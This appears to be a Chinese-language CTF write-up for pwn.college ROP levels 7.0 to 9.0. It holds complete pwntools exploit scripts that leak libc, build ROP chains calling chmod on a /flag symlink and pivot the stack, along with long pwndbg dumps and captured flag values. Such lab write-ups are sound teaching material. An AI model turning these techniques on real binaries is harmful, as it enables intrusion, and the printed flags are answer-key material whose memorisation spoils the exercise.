if __name__ == "__main__": main()
Flag: pwn.college{A-DtWrNucuvlqiQOl-yB1ARFcxt.0lM1MDL5cTNxgzW}
Level 7.0
- Category: Pwn
Utilize a libc leak to ROP with libc!
利用已经泄漏的 system
的地址减去 system
在 libc
中的偏移得到 libc
的基地址,然后通过 libc
基地址加上 chmod
在 libc
中的偏移就可以得到 chmod
的实际地址了。简简单单,都不需要想办法怎么泄漏地址,程序直接通过 dlsym((void *)0xFFFFFFFFFFFFFFFFLL, "system");
另外,为了防止有人不知道怎么获取当前程序使用的 libc
hacker@return-oriented-programming~level7-0:~$ ldd /challenge/babyrop_level7.0 linux-vdso.so.1 (0x00007ffd75fe8000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x0000745ac0578000) /lib64/ld-linux-x86-64.so.2 (0x0000745ac077b000)
嗯……如果你不知道我讲的是什么,建议去补习一下 PLT 延迟绑定。推荐看《程序员的自我修养——链接、装载与库》,CSAPP 也可以看看,反正底层知识有空一定要多学学,非常重要。
哎不对,难道说 Level 4……
from pwn import ( ELF, ROP, context, flat, gdb, log, os, process, remote,)
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level7.0"HOST, PORT = "localhost", 1337
gdbscript = """b *challenge+380c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: global elf
elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(leaked_addr): rop = ROP(elf) libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
padding_to_ret = b"".ljust(0x58, b"A")
libc.address = leaked_addr - libc.symbols["system"]
filename = next(elf.search(b"GNU")) mode = 0o4
pop_rdi_ret = rop.rdi.address pop_rsi_pop_r15_ret = rop.find_gadget(["pop rsi", "pop r15", "ret"]).address
payload = padding_to_ret payload += flat( pop_rdi_ret, filename, pop_rsi_pop_r15_ret, mode, b"".ljust(0x8, b"A"), libc.symbols["chmod"], )
return payload
def leak(target): target.recvuntil(b'"system" in libc is: ')
return int(target.recv(14), 16)
def attack(target, payload): try: os.system("ln -s /flag GNU")
send_payload(target, payload)
try: with open("/flag", "r") as file: content = file.read() log.success(content)
return True except FileNotFoundError: log.exception("The file '/flag' does not exist.") except PermissionError: log.failure("Permission denied to read '/flag'.") except Exception as e: log.exception(f"An error occurred while performing attack: {e}") except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload(leak(target))
if attack(target, payload): exit() except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{USImSejN9YmHN5CcyKDwtVScMO7.01M1MDL5cTNxgzW}
Level 7.1
- Category: Pwn
Utilize a libc leak to ROP with libc!
参见 Level 7.0。
from pwn import ( ELF, ROP, context, flat, gdb, log, os, process, remote,)
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level7.1"HOST, PORT = "localhost", 1337
gdbscript = """c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: global elf
elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(leaked_addr): rop = ROP(elf) libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
padding_to_ret = b"".ljust(0x48, b"A")
libc.address = leaked_addr - libc.symbols["system"]
filename = next(elf.search(b"GNU")) mode = 0o4
pop_rdi_ret = rop.rdi.address pop_rsi_pop_r15_ret = rop.find_gadget(["pop rsi", "pop r15", "ret"]).address
payload = padding_to_ret payload += flat( pop_rdi_ret, filename, pop_rsi_pop_r15_ret, mode, b"".ljust(0x8, b"A"), libc.symbols["chmod"], )
return payload
def leak(target): target.recvuntil(b'"system" in libc is: ')
return int(target.recv(14), 16)
def attack(target, payload): try: os.system("ln -s /flag GNU")
send_payload(target, payload)
try: with open("/flag", "r") as file: content = file.read() log.success(content)
return True except FileNotFoundError: log.exception("The file '/flag' does not exist.") except PermissionError: log.failure("Permission denied to read '/flag'.") except Exception as e: log.exception(f"An error occurred while performing attack: {e}") except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload(leak(target))
if attack(target, payload): exit() except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{g7Ura4DbaSnnNgm8JQPQ2XM6c_l.0FN1MDL5cTNxgzW}
Level 8.0
- Category: Pwn
ROP with libc, no free leak this time!
这次没有 Level 7 那么愚蠢的泄漏了,需要我们自己想办法获取 libc
不过思路很简单,我们先获取 elf.got["puts"]
在全局偏移表中的地址,然后通过 puts
函数泄漏这个地址指向的 puts
在 libc
中的实际地址。之后用它减去 libc.symbols["puts"]
就得到了 libc
基地址。程序也随之结束了,不过我们可以再次返回到 _start
重启整个程序,利用我们得到的基地址计算出 chmod
from pwn import ( ELF, ROP, context, flat, gdb, log, os, process, remote,)
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level8.0"HOST, PORT = "localhost", 1337
gdbscript = """b *challenge+384c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: global elf
elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(stage, leaked_addr=None): rop = ROP(elf) libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
padding_to_ret = b"".ljust(0x38, b"A")
pop_rdi_ret = rop.rdi.address pop_rsi_pop_r15_ret = rop.find_gadget(["pop rsi", "pop r15", "ret"]).address
payload = padding_to_ret
if stage == 1: payload += flat( pop_rdi_ret, elf.got["puts"], elf.plt["puts"], elf.symbols["_start"], )
return payload elif stage == 2: libc.address = leaked_addr - libc.symbols["puts"]
filename = next(elf.search(b"GNU")) mode = 0o4
payload += flat( pop_rdi_ret, filename, pop_rsi_pop_r15_ret, mode, b"".ljust(0x8, b"A"), libc.symbols["chmod"], )
return payload else: log.error("Incorrect stage number!")
def leak(target): target.recvuntil(b"Leaving!\x0a")
return int.from_bytes(target.recv(0x6), "little")
def attack(target, payload): try: os.system("ln -s /flag GNU")
send_payload(target, payload)
payload = construct_payload(2, leak(target))
send_payload(target, payload)
try: with open("/flag", "r") as file: content = file.read() log.success(content)
return True except FileNotFoundError: log.exception("The file '/flag' does not exist.") except PermissionError: log.failure("Permission denied to read '/flag'.") except Exception as e: log.exception(f"An error occurred while performing attack: {e}") except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload(1)
if attack(target, payload): exit() except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{oFCQDFxRqfNOwKX3jCEn79BN5cC.0VN1MDL5cTNxgzW}
Level 8.1
- Category: Pwn
ROP with libc, no free leak this time!
参见 Level 8.0。
from pwn import ( ELF, ROP, context, flat, gdb, log, os, process, remote,)
context(log_level="debug", terminal="kitty")
FILE = "./babyrop_level8.1"HOST, PORT = "localhost", 1337
gdbscript = """c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: global elf
elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
def send_payload(target, payload): try: target.send(payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def construct_payload(stage, leaked_addr=None): rop = ROP(elf) libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
padding_to_ret = b"".ljust(0x78, b"A")
pop_rdi_ret = rop.rdi.address pop_rsi_pop_r15_ret = rop.find_gadget(["pop rsi", "pop r15", "ret"]).address
payload = padding_to_ret
if stage == 1: payload += flat( pop_rdi_ret, elf.got["puts"], elf.plt["puts"], elf.symbols["_start"], )
return payload elif stage == 2: libc.address = leaked_addr - libc.symbols["puts"]
filename = next(elf.search(b"GNU")) mode = 0o4
payload += flat( pop_rdi_ret, filename, pop_rsi_pop_r15_ret, mode, b"".ljust(0x8, b"A"), libc.symbols["chmod"], )
return payload else: log.error("Incorrect stage number!")
def leak(target): target.recvuntil(b"Leaving!\x0a")
return int.from_bytes(target.recv(0x6), "little")
def attack(target, payload): try: os.system("ln -s /flag GNU")
send_payload(target, payload)
payload = construct_payload(2, leak(target))
send_payload(target, payload)
try: with open("/flag", "r") as file: content = file.read() log.success(content)
return True except FileNotFoundError: log.exception("The file '/flag' does not exist.") except PermissionError: log.failure("Permission denied to read '/flag'.") except Exception as e: log.exception(f"An error occurred while performing attack: {e}") except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: target = launch(debug=False) payload = construct_payload(1)
if attack(target, payload): exit() except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{Q0NC7L0dteUeHqynz_c9HjT-w2R.0lN1MDL5cTNxgzW}
Level 9.0
- Category: Pwn
Perform a stack pivot to gain control flow!
这题得用栈迁移 (Stack pivot),不错,新技巧++。
28 collapsed lines
int __fastcall challenge(int a1, __int64 a2, __int64 a3){ _QWORD v4[3]; // [rsp+0h] [rbp-40h] BYREF int v5; // [rsp+1Ch] [rbp-24h] __int64 *v6; // [rsp+30h] [rbp-10h] int v7; // [rsp+3Ch] [rbp-4h] __int64 savedregs; // [rsp+40h] [rbp+0h] BYREF _UNKNOWN *retaddr; // [rsp+48h] [rbp+8h] BYREF
v5 = a1; v4[2] = a2; v4[1] = a3; puts( "This challenge reads in some bytes, overflows its stack, and allows you to perform a ROP attack. Through this series of"); puts("challenges, you will become painfully familiar with the concept of Return Oriented Programming!\n"); sp_ = (__int64)v4; bp_ = (__int64)&savedregs; sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v4) >> 3) + 2; rp_ = (__int64)&retaddr; puts("This challenge doesn't give you much to work with, so you will have to be resourceful."); puts("What you'd really like to know is the address of libc."); puts("In order to get the address of libc, you'll have to leak it yourself."); puts("An easy way to do this is to do what is known as a `puts(puts)`."); puts("The outer `puts` is puts@plt: this will actually invoke puts, thus initiating a leak."); puts("The inner `puts` is puts@got: this contains the address of puts in libc."); puts("Then you will need to continue executing a new ROP chain with addresses based on that leak."); puts("One easy way to do that is to just restart the binary by returning to its entrypoint."); puts("Previous challenges let you write your ROP chain directly onto the stack."); puts("This challenge is not so nice!"); puts("Your input will be read to the .bss, and only a small part of it will be copied to the stack."); puts("You will need to figure out how to use stack pivoting to execute your full ropchain!"); v7 = read(0, &unk_4150E0, 0x1000uLL); printf("Received %d bytes! This is potentially %d gadgets.\n", v7, v7 / 8); puts("Let's take a look at your chain! Note that we have no way to verify that the gadgets are executable"); puts("from within this challenge. You will have to do that by yourself."); print_chain(&unk_4150E0, (unsigned int)(v7 / 8)); v6 = &savedregs; memcpy(&retaddr, &unk_4150E0, 0x18uLL); printf("Of course, only %d bytes of the above ropchain was copied to the stack!\n", 24); puts("Let's take a look at just that part of the chain. To execute the rest, you'll have to pivot the stack!"); print_chain(rp_, 3LL);2 collapsed lines
return puts("Leaving!");}
Breakpoint 1, 0x000000000040266c in challenge ()19 collapsed lines
------- tip of the day (disable with set show-tips off) -------Use track-got enable|info|query to track GOT accesses - useful for hijacking control flow via writable GOT/PLTLEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────── RAX 0x7fffc71bc828 —▸ 0x40275b (main+165) ◂— lea rdi, [rip + 0x107e] RBX 0x7fffc71bc978 —▸ 0x7fffc71bd635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0' RCX 0x7ebc87f1b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */ RDX 0x18 RDI 0x7fffc71bc828 —▸ 0x40275b (main+165) ◂— lea rdi, [rip + 0x107e] RSI 0x4150e0 (data+65536) —▸ 0x40129d (__do_global_dtors_aux+29) ◂— pop rbp R8 0x17bdf010 ◂— 0 R9 7 R10 0x17bdf780 ◂— 0x17bc8d1f R11 0x202 R12 1 R13 0 R14 0x7ebc888ab000 (_rtld_global) —▸ 0x7ebc888ac2e0 ◂— 0 R15 0 RBP 0x7fffc71bc820 —▸ 0x7fffc71bc850 —▸ 0x7fffc71bc8f0 —▸ 0x7fffc71bc950 ◂— 0 RSP 0x7fffc71bc7e0 —▸ 0x7fffc71bc820 —▸ 0x7fffc71bc850 —▸ 0x7fffc71bc8f0 —▸ 0x7fffc71bc950 ◂— ... RIP 0x40266c (challenge+409) ◂— call 0x401170────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────── ► 0x40266c <challenge+409> call memcpy@plt <memcpy@plt> dest: 0x7fffc71bc828 —▸ 0x40275b (main+165) ◂— lea rdi, [rip + 0x107e] src: 0x4150e0 (data+65536) —▸ 0x40129d (__do_global_dtors_aux+29) ◂— pop rbp n: 0x18
0x402671 <challenge+414> mov esi, 0x18 ESI => 0x18 0x402676 <challenge+419> lea rdi, [rip + 0x108b] RDI => 0x403708 ◂— 'Of course, only %d bytes of the above ropchain was...'26 collapsed lines
0x40267d <challenge+426> mov eax, 0 EAX => 0 0x402682 <challenge+431> call printf@plt <printf@plt>
0x402687 <challenge+436> lea rdi, [rip + 0x10ca] RDI => 0x403758 ◂— "Let's take a look at just that part of the chain. ..." 0x40268e <challenge+443> call puts@plt <puts@plt>
0x402693 <challenge+448> mov rax, qword ptr [rip + 0x13a4e] RAX, [rp_] 0x40269a <challenge+455> mov esi, 3 ESI => 3 0x40269f <challenge+460> mov rdi, rax 0x4026a2 <challenge+463> call print_chain <print_chain>─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7fffc71bc7e0 —▸ 0x7fffc71bc820 —▸ 0x7fffc71bc850 —▸ 0x7fffc71bc8f0 —▸ 0x7fffc71bc950 ◂— ...01:0008│-038 0x7fffc71bc7e8 —▸ 0x7fffc71bc988 —▸ 0x7fffc71bd66a ◂— 'MOTD_SHOWN=pam'02:0010│-030 0x7fffc71bc7f0 —▸ 0x7fffc71bc978 —▸ 0x7fffc71bd635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'03:0018│-028 0x7fffc71bc7f8 ◂— 0x1c71bc97804:0020│-020 0x7fffc71bc800 —▸ 0x7fffc71bc978 —▸ 0x7fffc71bd635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'05:0028│-018 0x7fffc71bc808 ◂— 106:0030│-010 0x7fffc71bc810 —▸ 0x7fffc71bc820 —▸ 0x7fffc71bc850 —▸ 0x7fffc71bc8f0 —▸ 0x7fffc71bc950 ◂— ...07:0038│-008 0x7fffc71bc818 ◂— 0x38888ab000───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────── ► 0 0x40266c challenge+409 1 0x40275b main+165 2 0x7ebc87e34e08 3 0x7ebc87e34ecc __libc_start_main+140 4 0x4011fe _start+46────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> i frameStack level 0, frame at 0x7fffc71bc830: rip = 0x40266c in challenge; saved rip = 0x40275b called by frame at 0x7fffc71bc860 Arglist at 0x7fffc71bc820, args: Locals at 0x7fffc71bc820, Previous frame's sp is 0x7fffc71bc830 Saved registers: rbp at 0x7fffc71bc820, rip at 0x7fffc71bc828pwndbg> p/d 0x18$1 = 24
在执行 memcpy
之前有一个 read
,可以读取 0x1000
bytes 输入到数据段 0x4150e0 (data+65536)
虽然大小足够大,但因为是读到数据段,所以我们不能通过 read
覆盖返回地址,那么很显然,问题就出这个 memcpy
上了。我们注意到它把数据从 0x4150e0 (data+65536)
复制到 0x7fffc71bc828
,注意到这个地址正是我们的返回地址,但是它又限制了我们只能复制 0x18
bytes,也就是三条指令到 0x7fffc71bc828
,故我们要是想直接把完整的 payload 通过一次 memcpy
执行完是不可能的。如此限制,有何破解之法?当然是栈迁移!通过栈迁移我们可以得到一个更大的空间来发挥,而不用受限于这小小的 0x18
bytes 的空间。
简单来讲一下栈迁移原理。我们知道 leave
mov rsp, rbppop rbp
那我们只要控制 rbp
指向我们想到的新的栈的地址,就实现了栈迁移,之后所有 gadgets 的操作都基于新的栈。至于后面那条 pop rbp
倒是无所谓,我们重点关注的是 rsp
的地址,因为一系列 gadgets 都是通过 ret
做的就是 pop rip
,这都有关于 rsp
当然,可以实现栈迁移的方法不止 leave; ret
一种,能改变 rsp
那么现在的问题是,迁移到哪里?首先肯定得是 rw
区吧,不然怎么实现 ROP。一个比较常见的方法应该是迁移到 .bss
段。pwntools 还是很方便的,通过 elf.bss()
即可得到当前程序的 .bss
Breakpoint 1, 0x000000000040266c in challenge ()19 collapsed lines
------- tip of the day (disable with set show-tips off) -------Want to display each context panel in a separate tmux window? See https://github.com/pwndbg/pwndbg/blob/dev/FEATURES.md#splitting--layouting-contextLEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────── RAX 0x7fff4c2cfca8 —▸ 0x40275b (main+165) ◂— lea rdi, [rip + 0x107e] RBX 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0' RCX 0x7d78a471b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */ RDX 0x18 RDI 0x7fff4c2cfca8 —▸ 0x40275b (main+165) ◂— lea rdi, [rip + 0x107e] RSI 0x4150e0 (data+65536) —▸ 0x40129d (__do_global_dtors_aux+29) ◂— pop rbp R8 0x27643010 ◂— 0 R9 7 R10 0x27643780 ◂— 0x27664083 R11 0x202 R12 1 R13 0 R14 0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 0 R15 0 RBP 0x7fff4c2cfca0 —▸ 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— 0 RSP 0x7fff4c2cfc60 —▸ 0x7fff4c2cfca0 —▸ 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— ... RIP 0x40266c (challenge+409) ◂— call 0x401170────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────── ► 0x40266c <challenge+409> call memcpy@plt <memcpy@plt> dest: 0x7fff4c2cfca8 —▸ 0x40275b (main+165) ◂— lea rdi, [rip + 0x107e] src: 0x4150e0 (data+65536) —▸ 0x40129d (__do_global_dtors_aux+29) ◂— pop rbp n: 0x18
0x402671 <challenge+414> mov esi, 0x18 ESI => 0x18 0x402676 <challenge+419> lea rdi, [rip + 0x108b] RDI => 0x403708 ◂— 'Of course, only %d bytes of the above ropchain was...'26 collapsed lines
0x40267d <challenge+426> mov eax, 0 EAX => 0 0x402682 <challenge+431> call printf@plt <printf@plt>
0x402687 <challenge+436> lea rdi, [rip + 0x10ca] RDI => 0x403758 ◂— "Let's take a look at just that part of the chain. ..." 0x40268e <challenge+443> call puts@plt <puts@plt>
0x402693 <challenge+448> mov rax, qword ptr [rip + 0x13a4e] RAX, [rp_] 0x40269a <challenge+455> mov esi, 3 ESI => 3 0x40269f <challenge+460> mov rdi, rax 0x4026a2 <challenge+463> call print_chain <print_chain>─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7fff4c2cfc60 —▸ 0x7fff4c2cfca0 —▸ 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— ...01:0008│-038 0x7fff4c2cfc68 —▸ 0x7fff4c2cfe08 —▸ 0x7fff4c2d066a ◂— 'MOTD_SHOWN=pam'02:0010│-030 0x7fff4c2cfc70 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'03:0018│-028 0x7fff4c2cfc78 ◂— 0x14c2cfdf804:0020│-020 0x7fff4c2cfc80 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'05:0028│-018 0x7fff4c2cfc88 ◂— 106:0030│-010 0x7fff4c2cfc90 —▸ 0x7fff4c2cfca0 —▸ 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— ...07:0038│-008 0x7fff4c2cfc98 ◂— 0x38a4fd4000───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────── ► 0 0x40266c challenge+409 1 0x40275b main+165 2 0x7d78a4634e08 3 0x7d78a4634ecc __libc_start_main+140 4 0x4011fe _start+46────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> p/x $rsi$1 = 0x4150e0pwndbg> cContinuing.
Breakpoint 2, 0x00000000004026b5 in challenge ()216 collapsed lines
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────*RAX 9 RBX 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0' RCX 0x7d78a471b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */*RDX 0*RDI 0x7d78a47f8710 ◂— 0*RSI 0x7d78a47f7643 (_IO_2_1_stdout_+131) ◂— 0x7f8710000000000a /* '\n' */*R8 0x20710 R9 7*R10 0x27643840 ◂— 0 R11 0x202 R12 1 R13 0 R14 0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 0 R15 0*RBP 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— 0*RSP 0x7fff4c2cfca8 —▸ 0x40129d (__do_global_dtors_aux+29) ◂— pop rbp*RIP 0x4026b5 (challenge+482) ◂— ret────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────── ► 0x4026b5 <challenge+482> ret <__do_global_dtors_aux+29> ↓ 0x40129d <__do_global_dtors_aux+29> pop rbp RBP => 0x4050a0 (stdout@@GLIBC_2.2.5) 0x40129e <__do_global_dtors_aux+30> ret <print_gadget+498> ↓ 0x4016ab <print_gadget+498> leave 0x4016ac <print_gadget+499> ret <0> ↓
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7fff4c2cfca8 —▸ 0x40129d (__do_global_dtors_aux+29) ◂— pop rbp01:0008│-020 0x7fff4c2cfcb0 —▸ 0x4050a0 (stdout@@GLIBC_2.2.5) —▸ 0x7d78a47f75c0 (_IO_2_1_stdout_) ◂— 0xfbad288702:0010│-018 0x7fff4c2cfcb8 —▸ 0x4016ab (print_gadget+498) ◂— leave03:0018│-010 0x7fff4c2cfcc0 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'04:0020│-008 0x7fff4c2cfcc8 ◂— 0x14c2cfdf805:0028│ rbp 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— 006:0030│+008 0x7fff4c2cfcd8 —▸ 0x7d78a4634e08 ◂— mov edi, eax07:0038│+010 0x7fff4c2cfce0 —▸ 0x7fff4c2cfd20 —▸ 0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 0───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────── ► 0 0x4026b5 challenge+482 1 0x40129d __do_global_dtors_aux+29 2 0x4050a0 stdout@@GLIBC_2.2.5 3 0x4016ab print_gadget+498 4 0x7d78a4634e08 5 0x7d78a4634ecc __libc_start_main+140 6 0x4011fe _start+46────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> ni0x000000000040129d in __do_global_dtors_aux ()LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────── RAX 9 RBX 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0' RCX 0x7d78a471b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */ RDX 0 RDI 0x7d78a47f8710 ◂— 0 RSI 0x7d78a47f7643 (_IO_2_1_stdout_+131) ◂— 0x7f8710000000000a /* '\n' */ R8 0x20710 R9 7 R10 0x27643840 ◂— 0 R11 0x202 R12 1 R13 0 R14 0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 0 R15 0 RBP 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— 0*RSP 0x7fff4c2cfcb0 —▸ 0x4050a0 (stdout@@GLIBC_2.2.5) —▸ 0x7d78a47f75c0 (_IO_2_1_stdout_) ◂— 0xfbad2887*RIP 0x40129d (__do_global_dtors_aux+29) ◂— pop rbp────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────── 0x4026b5 <challenge+482> ret <__do_global_dtors_aux+29> ↓ ► 0x40129d <__do_global_dtors_aux+29> pop rbp RBP => 0x4050a0 (stdout@@GLIBC_2.2.5) 0x40129e <__do_global_dtors_aux+30> ret <print_gadget+498> ↓ 0x4016ab <print_gadget+498> leave 0x4016ac <print_gadget+499> ret <0> ↓
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7fff4c2cfcb0 —▸ 0x4050a0 (stdout@@GLIBC_2.2.5) —▸ 0x7d78a47f75c0 (_IO_2_1_stdout_) ◂— 0xfbad288701:0008│-018 0x7fff4c2cfcb8 —▸ 0x4016ab (print_gadget+498) ◂— leave02:0010│-010 0x7fff4c2cfcc0 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'03:0018│-008 0x7fff4c2cfcc8 ◂— 0x14c2cfdf804:0020│ rbp 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— 005:0028│+008 0x7fff4c2cfcd8 —▸ 0x7d78a4634e08 ◂— mov edi, eax06:0030│+010 0x7fff4c2cfce0 —▸ 0x7fff4c2cfd20 —▸ 0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 007:0038│+018 0x7fff4c2cfce8 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────── ► 0 0x40129d __do_global_dtors_aux+29 1 0x4050a0 stdout@@GLIBC_2.2.5 2 0x4016ab print_gadget+498 3 0x7d78a4634e08 4 0x7d78a4634ecc __libc_start_main+140 5 0x4011fe _start+46────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg>0x000000000040129e in __do_global_dtors_aux ()LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────── RAX 9 RBX 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0' RCX 0x7d78a471b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */ RDX 0 RDI 0x7d78a47f8710 ◂— 0 RSI 0x7d78a47f7643 (_IO_2_1_stdout_+131) ◂— 0x7f8710000000000a /* '\n' */ R8 0x20710 R9 7 R10 0x27643840 ◂— 0 R11 0x202 R12 1 R13 0 R14 0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 0 R15 0*RBP 0x4050a0 (stdout@@GLIBC_2.2.5) —▸ 0x7d78a47f75c0 (_IO_2_1_stdout_) ◂— 0xfbad2887*RSP 0x7fff4c2cfcb8 —▸ 0x4016ab (print_gadget+498) ◂— leave*RIP 0x40129e (__do_global_dtors_aux+30) ◂— ret────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────── 0x4026b5 <challenge+482> ret <__do_global_dtors_aux+29> ↓ 0x40129d <__do_global_dtors_aux+29> pop rbp RBP => 0x4050a0 (stdout@@GLIBC_2.2.5) ► 0x40129e <__do_global_dtors_aux+30> ret <print_gadget+498> ↓ 0x4016ab <print_gadget+498> leave 0x4016ac <print_gadget+499> ret <0> ↓
